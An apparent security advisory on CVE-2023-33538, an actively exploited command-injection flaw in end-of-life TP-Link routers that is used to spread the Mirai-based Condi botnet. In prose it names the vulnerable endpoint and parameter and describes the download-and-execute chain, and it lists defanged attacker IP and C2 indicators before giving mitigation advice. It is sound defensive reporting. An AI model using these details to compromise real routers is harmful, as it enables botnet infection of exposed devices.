High

A critical security vulnerability, tracked as CVE-2023-33538, is being actively exploited in several end-of-life TP-Link Wi-Fi routers, allowing attackers to deploy Mirai-based botnet malware. The affected models include TL-WR940N (v2/v4), TL-WR740N (v1/v2), and TL-WR841N (v8/v10), all of which no longer receive security updates from the vendor. The flaw exists in the routers’ web management interface due to improper input validation in an HTTP GET request parameter, enabling attackers to inject and execute system commands remotely without triggering device-side warnings.

The exploitation process targets the /userRpm/WlanNetworkRpm endpoint, where malicious payloads are embedded in the ssid parameter. Once executed, the router is instructed to download an ELF binary named arm7 from a remote server (51.38.137[.]113), grant it execution permissions, and run it immediately. Security researchers observed large-scale automated attack activity following the addition of this CVE to CISA’s Known Exploited Vulnerabilities (KEV) catalog in June 2025, confirming active real-world exploitation attempts against exposed devices.

The downloaded arm7 binary is identified as a variant of Condi, a Mirai-based IoT botnet malware. Once installed, it connects to a command-and-control (C2) infrastructure, specifically including the domain cnc.vietdediserver[.]shop, and integrates the infected router into a larger botnet. The malware is designed with multiple capabilities, including heartbeat communication, command execution, self-updating mechanisms, and propagation features that help expand the botnet automatically across other vulnerable devices.

Further analysis shows the malware contains a self-update function (update_bins) that connects back to the attacker’s server to download updated binaries for multiple CPU architectures such as ARM, MIPS, SH4, and x86_64. It also launches an internal HTTP server on a randomly selected high port (1024–65535), enabling infected devices to distribute malware copies to new victims, increasing propagation efficiency. Although observed attacks contained implementation mistakes such as targeting the wrong parameter (ssid instead of ssid1) and relying on unavailable tools like wget, researchers confirmed the vulnerability is valid and fully exploitable when correctly executed.

Since the affected TP-Link devices are end-of-life, no official patches are available. TP-Link recommends replacing vulnerable routers with supported models, changing default credentials to prevent unauthorized access, and monitoring outbound network traffic for connections to known malicious infrastructure. Organizations are also advised to retire these devices where possible, as continued use poses a significant risk of botnet infection and remote compromise.